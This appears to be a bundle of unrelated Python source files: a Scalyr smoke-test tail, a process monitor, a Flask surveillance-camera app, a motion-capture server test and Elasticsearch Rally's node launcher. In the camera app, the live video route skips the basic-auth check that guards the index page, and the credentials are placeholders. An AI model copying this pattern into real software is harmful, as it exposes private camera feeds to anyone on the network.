"monitor": "agentKubernetes",
"k8s_node": "minikube",
"serverHost": "scalyr-agent-2-z5c8l",
"container_id": "6eb4215ac1589de13089419e90cdfe08c01262e6cfb821f18061a63ab4188a87",
"raw_timestamp": "2019-06-29T03:16:28.058676421Z",
"pod_name": "ci-agent-k8s-7777-uploader-76bcb9cf9-cb96t"
},
"thread": "default",
"message": "count=1000,line_stream=<stderr>,verifier_type=Kubernetes\n",
"timestamp": "1561778193736899060"
}
],
"""
if not all(
[
att.get("stream") in stream_name,
att.get("monitor") == "agentKubernetes",
process_name in att.get("pod_name"),
]
):
return False
return True
def _get_uploader_override_logfilename_regex(self, process_name):
"""For k8s, return a logfile regex because it too difficult to construct an exact logfile filter.
The regex clause becomes: $logfile+matches+"/docker/k8s_ci-agent-k8s-7777-uploader.*"
"""
return "{}/k8s_{}*".format(self._get_mapped_logfile_prefix(), process_name)
class LogstashActor(DockerSmokeTestActor):
"""
Uploader writes to a common shared logfile that is bind-mounted in a shared volume (not local disk)
Verifier reads from the common shared logfile
"""
VERIFIER_TYPE = "Logstash"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._monitored_logfile = kwargs.get("monitored_logfile")
def _get_uploader_output_streams(self):
"""Returns stream for Uploader to write log data into"""
return [open(self._monitored_logfile, "w+")]
def _get_uploader_stream_names(self):
"""Returns stream to read log data from"""
return [self._monitored_logfile]
def _get_stream_name_from_stream(self, stream):
return stream.name
def _get_expected_agent_logfiles(self):
return ["scalyr_logstash.log"]
def _get_mapped_logfile_prefix(self):
return "/logstash"
def _get_extra_query_attributes(self, stream_name, process_name):
# {'$stream': stream.name}
# no server-side parser has been defined so cannot filter on $stream
return {}
def _verify_queried_attributes(self, att, stream_name, process_name):
if not all(
[
# att.get('stream') in stream.name, # we haven't setup server-side parser so $stream is not available
# Since the input streams are locally mounted, the event origins are all the same as the agent hostname
att.get("origin") == self._agent_hostname,
# the following fields are added on in the logstash pipeline config
# and should appear in every event
att.get("output_attribute1") == "output_value1",
att.get("output_attribute2") == "output_value2",
att.get("output_attribute3") == "output_value3",
# TODO: adjust if these are eventually split into "booleans"
att.get("tags") == "[tag_t1, tag_t2]",
]
):
return False
return True
def _get_uploader_override_logfilename_regex(self, process_name):
"""For logstash setup, the input is a local file mounted to the logstash container, hence the fields are
host=container_id, path=/tmp/ci-plugin-logstash-7778-uploader.log
host/path are mapped to origin/logfile
"""
return self._monitored_logfile
# Select verifier class based on containers name (prefix)
CONTAINER_PREFIX_2_VERIFIER_CLASS = {
"ci-agent-standalone": StandaloneSmokeTestActor,
"ci-agent-docker-json": DockerJsonActor,
"ci-agent-docker-syslog": DockerSyslogActor,
"ci-agent-k8s": K8sActor,
"ci-plugin-logstash": LogstashActor,
}
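# Illustrative (hedged) examples of the prefix matching done in __main__ below:
#   process_name "ci-agent-docker-json-5986-verifier" -> DockerJsonActor
#   process_name "ci-agent-k8s-7777-uploader"         -> K8sActor
# Any process_name that does not start with one of the keys above aborts with an error.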
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"process_name",
type=str,
help="name of process running this instance of test code. Prefix should be a key in "
"CONTAINER_PREFIX_2_VERIFIER_CLASS so that the correct verifier can be chosen.",
)
parser.add_argument(
"max_wait", type=int, help="max seconds this test will run (will force-quit)"
)
# Generic param that can be used by any test as needed
parser.add_argument("--mode", type=str, help="mode switch", choices=NAME_SUFFIXES)
# For connecting to Scalyr. Note that we need not supply SCALYR_API_KEY as the Agent gets it from its own config
# or the environment.
parser.add_argument(
"--scalyr_server",
type=str,
help="Scalyr backend server (required by Agent or Verifier containers)",
)
parser.add_argument(
"--read_api_key",
type=str,
help="read api key (required all Verifier containers)",
)
# For Standalone testing
parser.add_argument(
"--monitored_logfile",
type=str,
help="absolute path of data file to write to (must match Agent config). "
"Logstash producers also write to this, which are then picked up by the Logstash agent.",
)
parser.add_argument(
"--python_version",
type=str,
help="python version agent is running on (will be added into generated test data)",
)
# For Docker testing
parser.add_argument(
"--agent_hostname",
type=str,
help="hostname of Agent container (required by Docker/k8s Verifier containers",
)
parser.add_argument(
"--uploader_hostname",
type=str,
help="hostname of Uploader container (required by Docker/k8s Verifier containers",
)
parser.add_argument("--debug", type=str, help="turn on debugging")
args = parser.parse_args()
klass = None
for key, val in CONTAINER_PREFIX_2_VERIFIER_CLASS.items():
if args.process_name.startswith(key):
klass = CONTAINER_PREFIX_2_VERIFIER_CLASS.get(key)
break
# Display args to stdout, redacting sensitive keys
_pretty_print("Launching actor", message="Class={}".format(klass))
if not klass:
_exit(
1,
message="Bad test config: process_name must start with one of {}".format(
CONTAINER_PREFIX_2_VERIFIER_CLASS.keys()
),
)
args_copy = deepcopy(vars(args))
if "read_api_key" in args_copy:
args_copy["read_api_key"] = args_copy["read_api_key"][:4] + "xxxxxxxxx"
_pretty_print("smoketest.py command line args", str(args_copy))
actor = klass(**vars(args)) # type: ignore
# Optionally start upload in a separate thread. Verifiers should not upload.
uploader_thread = None
if actor.is_uploader():
_pretty_print("START UPLOAD", actor._process_name)
uploader_thread = threading.Thread(target=actor.trigger_log_upload, args=())
uploader_thread.start()
if actor.is_verifier():
_pretty_print("START VERIFIER", actor._process_name)
actor.verify_or_die()
# If verify_or_die hasn't force-killed the program, wait for uploader to finish
if uploader_thread:
uploader_thread.join()
|
monitor.py
|
"""
JobMon - Job Monitoring
=======================
Controls and monitors child processes - this handles both starting and stopping
subprocesses, as well as notifying the owner that the subprocesses have started
(or stopped) via an event queue. An example usage of :class:`ChildProcessSkeleton`
(which is used by the :mod:`jobmon.config`) follows::
>>> proc = ChildProcessSkeleton('echo "$MESSAGE"')
>>> proc.config(stdout='/tmp/hello-world',
... env={'MESSAGE': 'Hello, World'})
>>> proc.set_event_sock(THE_EVENT_SOCKET)
The event socket (``THE_EVENT_SOCKET`` in the example) receives two kinds of
events from the child process - :class:`ProcStart` indicates that a process has
been started, while :class:`ProcStop` indicates that a process has stopped.
"""
import logging
import os
import signal
import sys
import threading
from jobmon import protocol, util
LOGGER = logging.getLogger('supervisor.child-process')
class AtomicBox:
"""
A value, which can only be accessed by one thread at a time.
"""
def __init__(self, value):
self.lock = threading.Lock()
self.value = value
def set(self, value):
"""
Sets the value of the box to a new value, blocking if anybody is
reading it.
"""
with self.lock:
self.value = value
def get(self):
"""
Gets the value of the box, blocking if anybody is writing to it.
"""
with self.lock:
return self.value
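# Minimal usage sketch for AtomicBox (illustrative, not part of the original module):
#
#   pid_box = AtomicBox(None)
#   pid_box.set(12345)            # e.g. the waiter thread records a child PID
#   if pid_box.get() is not None:
#       ...                       # another thread can read it without races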
class ChildProcess:
def __init__(self, event_sock, name, program, **config):
"""
Create a new :class:`ChildProcess`.
:param protocol.Protocol* event_sock: The event socket to send start/stop events to.
:param str name: The name of this job.
:param str program: The program to run, in a format supported by ``/bin/sh``.
:param str config: See :meth:`config` for the meaning of these options.
"""
self.event_sock = event_sock
self.name = name
self.program = program
self.child_pid = AtomicBox(None)
self.stdin = '/dev/null'
self.stdout = '/dev/null'
self.stderr = '/dev/null'
self.env = {}
self.working_dir = None
self.exit_signal = signal.SIGTERM
self.config(**config)
def config(self, **config):
"""
Configures various options of this child process.
:param config: Various configuration options - these include:
- ``stdin`` is the name of the file to hook up to the child process's
standard input.
- ``stdout`` is the name of the file to hook up the child process's
standard output.
- ``stderr`` is the name of the file to hook up the child process's
standard error.
- ``env`` is the environment to pass to the child process, as a
dictionary.
- ``cwd`` sets the working directory of the child process.
- ``sig`` sets the signal to send when terminating the child process.
"""
for config_name, config_value in config.items():
if config_name == 'stdin':
self.stdin = config_value
elif config_name == 'stdout':
self.stdout = config_value
elif config_name == 'stderr':
self.stderr = config_value
elif config_name == 'env':
self.env = config_value
elif config_name == 'cwd':
self.working_dir = config_value
elif config_name == 'sig':
self.exit_signal = config_value
else:
raise NameError('No configuration option "{}"'.format(
config_name))
def start(self):
"""
Launches the subprocess.
"""
if self.child_pid.get() is not None:
raise ValueError('Child process already running - cannot start another')
# Since we're going to be redirecting stdout/stderr, we need to flush
# these streams to prevent the child's logs from getting polluted
sys.stdout.flush()
sys.stderr.flush()
child_pid = os.fork()
if child_pid == 0:
try:
# Create a new process group, so that we don't end up killing
# ourselves if we kill this child. (For some reason, doing this
# didn't always work when done in the child, so it is done in the
# parent).
os.setsid()
# Put the proper file descriptors in to replace the standard
# streams
stdin = open(self.stdin)
stdout = open(self.stdout, 'a')
stderr = open(self.stderr, 'a')
os.dup2(stdin.fileno(), sys.stdin.fileno())
os.dup2(stdout.fileno(), sys.stdout.fileno())
os.dup2(stderr.fileno(), sys.stderr.fileno())
# (This only closes the original file descriptors, not the
# copied ones, so the files are not lost)
stdin.close()
stdout.close()
stderr.close()
# Update the child's environment with whatever variables were
# given to us.
for key, value in self.env.items():
os.environ[key] = value
# Change the directory to the preferred working directory for the
# child
if self.working_dir is not None:
os.chdir(self.working_dir)
# Run the child - to avoid keeping around an extra process, go
# ahead and pass the command to a subshell, which will replace
# this process
os.execvp('/bin/sh', ['/bin/sh', '-c', self.program])
finally:
# Just in case we fail, we need to avoid exiting this routine.
# os._exit() is used here to avoid the SystemExit exception -
# unittest (stupidly) catches SystemExit, as raised by sys.exit(),
# which we need to avoid.
os._exit(1)
else:
self.child_pid.set(child_pid)
self.event_sock.send(protocol.Event(self.name, protocol.EVENT_STARTJOB))
LOGGER.info('Starting child process')
LOGGER.info('- command = "%s"', self.program)
LOGGER.info('- stdin = %s', self.stdin)
LOGGER.info('- stdout = %s', self.stdout)
LOGGER.info('- stderr = %s', self.stderr)
LOGGER.info('- environment')
for var, value in self.env.items():
LOGGER.info('* "%s" = "%s"', var, value)
LOGGER.info('- working directory = %s',
self.working_dir if self.working_dir is not None
else os.getcwd())
@util.log_crashes(LOGGER, 'Error in child ' + self.name)
def wait_for_subprocess():
# Since waitpid() is synchronous (doing it asynchronously takes
# a good deal more work), the waiting is done in a worker thread
# whose only job is to wait until the child dies, and then to
# notify the parent.
#
# Although Linux pre-2.4 had issues with this (read waitpid(2)),
# this is fully compatible with POSIX.
LOGGER.info('Waiting on "%s"', self.program)
os.waitpid(self.child_pid.get(), 0)
LOGGER.info('"%s" died', self.program)
self.child_pid.set(None)
self.event_sock.send(protocol.Event(self.name, protocol.EVENT_STOPJOB))
# Although it might seem like a waste to spawn a thread for each
# running child, they don't do much work (they basically block for
# their whole existence).
waiter_thread = threading.Thread(target=wait_for_subprocess)
waiter_thread.start()
def kill(self):
"""
Signals the process with whatever signal was configured.
"""
child_pid = self.child_pid.get()
if child_pid is not None:
LOGGER.info('Sending signal %d to "%s"', self.exit_signal, self.program)
# Ensure all descendants of the process, not just the process itself,
# die. This requires killing the process group.
try:
proc_group = os.getpgid(child_pid)
LOGGER.info('Killing process group %d', proc_group)
os.killpg(proc_group, self.exit_signal)
LOGGER.info('Killed process group')
except OSError:
# This happened once during the testing, and means that the
# process has died somehow. Try to go ahead and kill the child
# by PID (since it is possible that, for some reason, setting
# the child's process group ID failed). If *that* fails, then
# just bail.
try:
LOGGER.info('Failed to kill child group of "%s" - falling back on killing the child itself', self.name)
os.kill(child_pid, self.exit_signal)
except OSError:
# So, *somehow*, the process isn't around, even though
# the variable state indicates it is. Obviously, the
# variable state is wrong, and we need to correct that.
LOGGER.info('Inconsistent child PID of "%s" - fixing', self.name)
self.child_pid.set(None)
LOGGER.info('Finished killing %s', self.name)
else:
raise ValueError('Child process not running - cannot kill it')
def get_status(self):
"""
Gets the current state of the process.
:return: ``True`` if running, ``False`` if not running.
"""
# self.child_pid is only set when the process is running, since :meth:`start`
# sets it and the death handler unsets it.
return self.child_pid.get() is not None
def get_pid(self):
"""
Gets the PID of the process.
:return: Either an ``int`` (representing the child's PID) if the
process is running, or ``None`` if it is not.
"""
return self.child_pid.get()
class ChildProcessSkeleton(ChildProcess):
def __init__(self, name, program, **config):
"""
Creates a new :class:`ChildProcessSkeleton`, which is like a
:class:`ChildProcess` but which allows the event queue to be specified
later.
With the exception of the event queue, the parameters are the same as
:meth:`ChildProcess.__init__`.
"""
super().__init__(None, name, program, **config)
def set_event_sock(self, event_sock):
"""
Sets up the event queue, allowing this skeleton to be used.
:param protocol.Protocol* event_sock: The event socket to send start/stop events to.
"""
self.event_sock = event_sock
def start(self):
"""
See :meth:`ChildProcess.start`.
This simply wraps that method to raise a :class:`AttributeError` if the
event socket has not been provided.
"""
if self.event_sock is None:
raise AttributeError('ChildProcessSkeleton was not instantiated')
return super().start()
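# Minimal lifecycle sketch (illustrative; `event_sock` stands for a hypothetical
# protocol.Protocol* object and is not defined in this module):
#
#   skeleton = ChildProcessSkeleton('hello', 'echo "$MESSAGE"',
#                                   stdout='/tmp/hello-world',
#                                   env={'MESSAGE': 'Hello, World'})
#   skeleton.set_event_sock(event_sock)
#   skeleton.start()   # forks /bin/sh -c 'echo "$MESSAGE"' and sends EVENT_STARTJOB
#   skeleton.kill()    # signals the child's process group with the configured signal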
|
main.py
|
import cv2
import sys
from mail import sendEmail
from flask import Flask, render_template, Response
from camera import VideoCamera
from flask_basicauth import BasicAuth
import time
import threading
email_update_interval = 600 # sends an email only once in this time interval
video_camera = VideoCamera(flip=True) # creates a camera object, flip vertically
object_classifier = cv2.CascadeClassifier("models/fullbody_recognition_model.xml") # an opencv classifier
# App Globals (do not edit)
app = Flask(__name__)
app.config['BASIC_AUTH_USERNAME'] = 'CHANGE_ME_USERNAME'
app.config['BASIC_AUTH_PASSWORD'] = 'CHANGE_ME_PLEASE'
app.config['BASIC_AUTH_FORCE'] = True
basic_auth = BasicAuth(app)
last_epoch = 0
def check_for_objects():
global last_epoch
while True:
try:
frame, found_obj = video_camera.get_object(object_classifier)
if found_obj and (time.time() - last_epoch) > email_update_interval:
last_epoch = time.time()
print "Sending email..."
sendEmail(frame)
print "done!"
except:
print "Error sending email: ", sys.exc_info()[0]
@app.route('/')
@basic_auth.required
def index():
return render_template('index.html')
def gen(camera):
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
@app.route('/video_feed')
def video_feed():
return Response(gen(video_camera),
mimetype='multipart/x-mixed-replace; boundary=frame')
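# Illustrative note (hedged): each chunk yielded by gen() above is one JPEG frame framed
# for the multipart/x-mixed-replace response, roughly:
#   --frame\r\nContent-Type: image/jpeg\r\n\r\n<jpeg bytes>\r\n\r\n
# so the browser keeps replacing the displayed image as new frames arrive.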
if __name__ == '__main__':
t = threading.Thread(target=check_for_objects, args=())
t.daemon = True
t.start()
app.run(host='0.0.0.0', debug=False)
|
test_Server.py
|
# coding: utf-8
"""Integration tests for comms module using Server class."""
import sys
import time
import pytest
import natnet
if sys.platform == 'win32':
# For some reason multiprocessing is letting me pickle lambdas everywhere except on Windows.
# The 'multiprocess' library from pathos uses dill instead of pickle, so happily pickles
# everything, but doesn't have coverage support.
# So, use multiprocess on Windows and multiprocessing elsewhere, and let Codecov sort it out
import multiprocess as multiprocessing
else:
import multiprocessing
class MPServer(natnet.Server):
def __init__(self, started_event, exit_event, *args, **kwargs):
super(MPServer, self).__init__(*args, **kwargs)
self.started_event = started_event # type: multiprocessing.Event
self.exit_event = exit_event # type: multiprocessing.Event
def _run(self, *args, **kwargs):
self.started_event.set()
super(MPServer, self)._run(*args, **kwargs)
def should_exit(self):
return self.exit_event.is_set()
should_exit = property(should_exit, lambda self, e: None)
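    # Note (hedged): the property above makes `should_exit` read from the shared
    # multiprocessing Event while silently ignoring any assignment the natnet Server
    # base class may attempt, so the exit flag can only be driven from the test process.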
@pytest.fixture()
def server():
started_event = multiprocessing.Event()
exit_event = multiprocessing.Event()
process = multiprocessing.Process(target=lambda: MPServer(started_event, exit_event).run(rate=1000))
process.start()
started_event.wait() # Starting processes is really slow on Windows
time.sleep(0.1) # Give the server a head start at stdout
yield
exit_event.set()
process.join(timeout=1)
process.terminate()
@pytest.mark.timeout(5)
def test_autodiscovery(server):
c = natnet.Client.connect(timeout=1)
c.run_once()
|
launcher.py
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import os
import signal
import subprocess
import threading
import shlex
from esrally import config, time, exceptions, client
from esrally.mechanic import telemetry, cluster, java_resolver
from esrally.utils import process, jvm
def wait_for_rest_layer(es, max_attempts=20):
for attempt in range(max_attempts):
import elasticsearch
try:
es.info()
return True
except elasticsearch.TransportError as e:
if e.status_code == 503 or isinstance(e, elasticsearch.ConnectionError):
time.sleep(1)
elif e.status_code == 401:
time.sleep(1)
else:
raise e
return False
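# Illustrative usage (hedged): ClusterLauncher.start() below calls this as
# wait_for_rest_layer(es_default, max_attempts=40) and treats a False return as a
# launch failure.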
class ClusterLauncher:
"""
The cluster launcher performs cluster-wide tasks that need to be done in the startup / shutdown phase.
"""
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
"""
Creates a new ClusterLauncher.
:param cfg: The config object.
:param metrics_store: A metrics store that is configured to receive system metrics.
:param client_factory_class: A factory class that can create an Elasticsearch client.
"""
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self):
"""
Performs final startup tasks.
Precondition: All cluster nodes have been started.
Postcondition: The cluster is ready to receive HTTP requests or a ``LaunchError`` is raised.
:return: A representation of the launched cluster.
"""
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
all_hosts = self.cfg.opts("client", "hosts").all_hosts
default_hosts = self.cfg.opts("client", "hosts").default
preserve = self.cfg.opts("mechanic", "preserve.install")
es = {}
for cluster_name, cluster_hosts in all_hosts.items():
all_client_options = self.cfg.opts("client", "options").all_client_options
cluster_client_options = dict(all_client_options[cluster_name])
# Use retries to avoid aborts on long living connections for telemetry devices
cluster_client_options["retry-on-timeout"] = True
es[cluster_name] = self.client_factory(cluster_hosts, cluster_client_options).create()
es_default = es["default"]
t = telemetry.Telemetry(enabled_devices, devices=[
telemetry.NodeStats(telemetry_params, es, self.metrics_store),
telemetry.ClusterMetaDataInfo(es_default),
telemetry.ClusterEnvironmentInfo(es_default, self.metrics_store),
telemetry.JvmStatsSummary(es_default, self.metrics_store),
telemetry.IndexStats(es_default, self.metrics_store),
telemetry.MlBucketProcessingTime(es_default, self.metrics_store),
telemetry.CcrStats(telemetry_params, es, self.metrics_store),
telemetry.RecoveryStats(telemetry_params, es, self.metrics_store)
])
# The list of nodes will be populated by ClusterMetaDataInfo, so no need to do it here
c = cluster.Cluster(default_hosts, [], t, preserve)
self.logger.info("All cluster nodes have successfully started. Checking if REST API is available.")
if wait_for_rest_layer(es_default, max_attempts=40):
self.logger.info("REST API is available. Attaching telemetry devices to cluster.")
t.attach_to_cluster(c)
self.logger.info("Telemetry devices are now attached to the cluster.")
else:
# Just stop the cluster here and raise. The caller is responsible for terminating individual nodes.
self.logger.error("REST API layer is not yet available. Forcefully terminating cluster.")
self.stop(c)
raise exceptions.LaunchError("Elasticsearch REST API layer is not available. Forcefully terminated cluster.")
return c
def stop(self, c):
"""
Performs cleanup tasks. This method should be called before nodes are shut down.
:param c: The cluster that is about to be stopped.
"""
c.telemetry.detach_from_cluster(c)
class StartupWatcher:
def __init__(self, node_name, server, startup_event):
self.node_name = node_name
self.server = server
self.startup_event = startup_event
self.logger = logging.getLogger(__name__)
def watch(self):
"""
Reads the output from the ES (node) subprocess.
"""
lines_to_log = 0
while True:
line = self.server.stdout.readline().decode("utf-8")
if len(line) == 0:
self.logger.info("%s (stdout): No more output. Process has likely terminated.", self.node_name)
self.await_termination(self.server)
self.startup_event.set()
break
line = line.rstrip()
# if an error occurs, log the next few lines
if "error" in line.lower():
lines_to_log = 10
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not self.startup_event.isSet() or lines_to_log > 0:
self.logger.info("%s (stdout): %s", self.node_name, line)
lines_to_log -= 1
# no need to check as soon as we have detected node startup
if not self.startup_event.isSet():
if line.find("Initialization Failed") != -1 or line.find("A fatal exception has occurred") != -1:
self.logger.error("[%s] encountered initialization errors.", self.node_name)
# wait a moment to ensure the process has terminated before we signal that we detected a (failed) startup.
self.await_termination(self.server)
self.startup_event.set()
if line.endswith("started") and not self.startup_event.isSet():
self.startup_event.set()
self.logger.info("[%s] has successfully started.", self.node_name)
def await_termination(self, server, timeout=5):
# wait a moment to ensure the process has terminated
wait = timeout
while server.returncode is None and wait > 0:
time.sleep(0.1)
server.poll()
wait -= 1
def _start(process, node_name):
log = logging.getLogger(__name__)
startup_event = threading.Event()
watcher = StartupWatcher(node_name, process, startup_event)
t = threading.Thread(target=watcher.watch)
t.setDaemon(True)
t.start()
if startup_event.wait(timeout=InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
process.poll()
# has the process terminated?
if process.returncode:
msg = "Node [%s] has terminated with exit code [%s]." % (node_name, str(process.returncode))
log.error(msg)
raise exceptions.LaunchError(msg)
else:
log.info("Started node [%s] with PID [%s].", node_name, process.pid)
return process
else:
msg = "Could not start node [%s] within timeout period of [%s] seconds." % (
node_name, InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
# check if the process has terminated already
process.poll()
if process.returncode:
msg += " The process has already terminated with exit code [%s]." % str(process.returncode)
else:
msg += " The process seems to be still running with PID [%s]." % process.pid
log.error(msg)
raise exceptions.LaunchError(msg)
class DockerLauncher:
# May download a Docker image and that can take some time
PROCESS_WAIT_TIMEOUT_SECONDS = 10 * 60
def __init__(self, cfg, metrics_store):
self.cfg = cfg
self.metrics_store = metrics_store
self.binary_paths = {}
self.node_name = None
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
nodes = []
for node_configuration in node_configurations:
node_name = node_configuration.node_name
host_name = node_configuration.ip
binary_path = node_configuration.binary_path
self.binary_paths[node_name] = binary_path
p = self._start_process(cmd="docker-compose -f %s up" % binary_path, node_name=node_name)
# only support a subset of telemetry for Docker hosts (specifically, we do not allow users to enable any devices)
node_telemetry = [
telemetry.DiskIo(self.metrics_store, len(node_configurations)),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store)
]
t = telemetry.Telemetry(devices=node_telemetry)
nodes.append(cluster.Node(p, host_name, node_name, t))
return nodes
def _start_process(self, cmd, node_name):
return _start(subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping Docker container running.")
else:
self.logger.info("Stopping Docker container")
for node in nodes:
node.telemetry.detach_from_node(node, running=True)
process.run_subprocess_with_logging("docker-compose -f %s down" % self.binary_paths[node.node_name])
node.telemetry.detach_from_node(node, running=False)
class ExternalLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self, node_configurations=None):
hosts = self.cfg.opts("client", "hosts").default
client_options = self.cfg.opts("client", "options").default
es = self.client_factory(hosts, client_options).create()
# cannot enable custom telemetry devices here
t = telemetry.Telemetry(devices=[
# This is needed to actually populate the nodes
telemetry.ClusterMetaDataInfo(es),
# will gather node specific meta-data for all nodes
telemetry.ExternalEnvironmentInfo(es, self.metrics_store),
])
# We create a pseudo-cluster here to get information about all nodes.
# cluster nodes will be populated by the external environment info telemetry device. We cannot know this upfront.
c = cluster.Cluster(hosts, [], t)
user_defined_version = self.cfg.opts("mechanic", "distribution.version", mandatory=False)
distribution_version = es.info()["version"]["number"]
if not user_defined_version or user_defined_version.strip() == "":
self.logger.info("Distribution version was not specified by user. Rally-determined version is [%s]", distribution_version)
self.cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", distribution_version)
elif user_defined_version != distribution_version:
self.logger.warning("Distribution version '%s' on command line differs from actual cluster version '%s'.",
user_defined_version, distribution_version)
t.attach_to_cluster(c)
return c.nodes
def stop(self, nodes):
# nothing to do here, externally provisioned clusters / nodes don't have any specific telemetry devices attached.
pass
class InProcessLauncher:
"""
Launcher is responsible for starting and stopping the benchmark candidate.
"""
PROCESS_WAIT_TIMEOUT_SECONDS = 90.0
def __init__(self, cfg, metrics_store, races_root_dir, clock=time.Clock):
self.cfg = cfg
self.metrics_store = metrics_store
self._clock = clock
self.races_root_dir = races_root_dir
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
# we're very specific which nodes we kill as there is potentially also an Elasticsearch based metrics store running on this machine
# The only specific trait of a Rally-related process is that it is started "somewhere" in the races root directory.
#
# We also do this only once per host otherwise we would kill instances that we've just launched.
process.kill_running_es_instances(self.races_root_dir)
node_count_on_host = len(node_configurations)
return [self._start_node(node_configuration, node_count_on_host) for node_configuration in node_configurations]
def _start_node(self, node_configuration, node_count_on_host):
host_name = node_configuration.ip
node_name = node_configuration.node_name
car = node_configuration.car
binary_path = node_configuration.binary_path
data_paths = node_configuration.data_paths
node_telemetry_dir = "%s/telemetry" % node_configuration.node_root_path
java_major_version, java_home = java_resolver.java_home(car, self.cfg)
self.logger.info("Starting node [%s] based on car [%s].", node_name, car)
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
node_telemetry = [
telemetry.FlightRecorder(telemetry_params, node_telemetry_dir, java_major_version),
telemetry.JitCompiler(node_telemetry_dir),
telemetry.Gc(node_telemetry_dir, java_major_version),
telemetry.PerfStat(node_telemetry_dir),
telemetry.DiskIo(self.metrics_store, node_count_on_host),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store),
telemetry.IndexSize(data_paths, self.metrics_store),
telemetry.MergeParts(self.metrics_store, node_configuration.log_path),
telemetry.StartupTime(self.metrics_store),
]
t = telemetry.Telemetry(enabled_devices, devices=node_telemetry)
env = self._prepare_env(car, node_name, java_home, t)
t.on_pre_node_start(node_name)
node_process = self._start_process(env, node_name, binary_path)
node = cluster.Node(node_process, host_name, node_name, t)
self.logger.info("Attaching telemetry devices to node [%s].", node_name)
t.attach_to_node(node)
return node
def _prepare_env(self, car, node_name, java_home, t):
env = {}
env.update(os.environ)
env.update(car.env)
self._set_env(env, "PATH", os.path.join(java_home, "bin"), separator=os.pathsep)
# Don't merge here!
env["JAVA_HOME"] = java_home
# we just blindly trust telemetry here...
for k, v in t.instrument_candidate_env(car, node_name).items():
self._set_env(env, k, v)
exit_on_oome_flag = "-XX:+ExitOnOutOfMemoryError"
if jvm.supports_option(java_home, exit_on_oome_flag):
self.logger.info("Setting [%s] to detect out of memory errors during the benchmark.", exit_on_oome_flag)
self._set_env(env, "ES_JAVA_OPTS", exit_on_oome_flag)
else:
self.logger.info("JVM does not support [%s]. A JDK upgrade is recommended.", exit_on_oome_flag)
self.logger.debug("env for [%s]: %s", node_name, str(env))
return env
def _set_env(self, env, k, v, separator=' '):
if v is not None:
if k not in env:
env[k] = v
else: # merge
env[k] = v + separator + env[k]
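    # Illustrative example (hedged): if env already contains ES_JAVA_OPTS="-Xmx1g",
    # then _set_env(env, "ES_JAVA_OPTS", "-XX:+ExitOnOutOfMemoryError") yields
    # "-XX:+ExitOnOutOfMemoryError -Xmx1g" (new value first, joined by the separator,
    # which defaults to a single space).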
def _start_process(self, env, node_name, binary_path):
if os.geteuid() == 0:
raise exceptions.LaunchError("Cannot launch Elasticsearch as root. Please run Rally as a non-root user.")
os.chdir(binary_path)
cmd = ["bin/elasticsearch"]
return _start(subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, env=env), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping [%d] nodes on this host running.", len(nodes))
else:
self.logger.info("Shutting down [%d] nodes on this host.", len(nodes))
for node in nodes:
process = node.process
node_name = node.node_name
node.telemetry.detach_from_node(node, running=True)
if not self.keep_running:
stop_watch = self._clock.stop_watch()
stop_watch.start()
try:
os.kill(process.pid, signal.SIGINT)
process.wait(10.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
except subprocess.TimeoutExpired:
# kill -9
self.logger.warning("Node [%s] did not shut down after 10 seconds; now kill -QUIT node, to see threads:", node_name)
try:
os.kill(process.pid, signal.SIGQUIT)
except OSError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
break
try:
process.wait(120.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
break
except subprocess.TimeoutExpired:
pass
self.logger.info("kill -KILL node [%s]", node_name)
try:
process.kill()
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
node.telemetry.detach_from_node(node, running=False)
|
gst-rtsp-launch.py
|
#!/usr/bin/python
# --------------------------------------------------------------------------- #
# Supporting arguments
# --------------------------------------------------------------------------- #
import argparse
parser = argparse.ArgumentParser(description="gst-rtsp-launch-py V0.1")
parser.add_argument('-v', '--verbose', action='store_true', help='Make script chatty')
parser.add_argument('-f', '--file', action='store', default="v4l2ctl.json", help='Video Configuration file')
